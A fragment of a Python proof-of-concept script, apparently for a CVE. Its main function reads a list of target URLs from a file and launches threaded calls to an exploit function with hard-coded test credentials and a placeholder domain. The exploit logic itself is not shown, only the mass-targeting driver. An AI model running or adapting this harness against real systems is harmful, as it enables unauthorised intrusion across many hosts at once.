()
| 60 | return False |
| 61 | |
| 62 | def main(): |
| 63 | with open("maybe-exploit.txt", "r") as file: |
| 64 | urls = file.readlines() |
| 65 | username = "cvetest" |
| 66 | password = "cvetest@2023" |
| 67 | # Fill it in casually, for example: poc.com |
| 68 | domain = "poc.com" |
| 69 | threads = [] |
| 70 | for url in urls: |
| 71 | url = url.strip() |
| 72 | thread = threading.Thread(target=exploit, args=(url, username, password, domain)) |
| 73 | thread.start() |
| 74 | threads.append(thread) |
| 75 | for thread in threads: |
| 76 | thread.join() |
| 77 | |
| 78 | if __name__ == "__main__": |
| 79 | main() |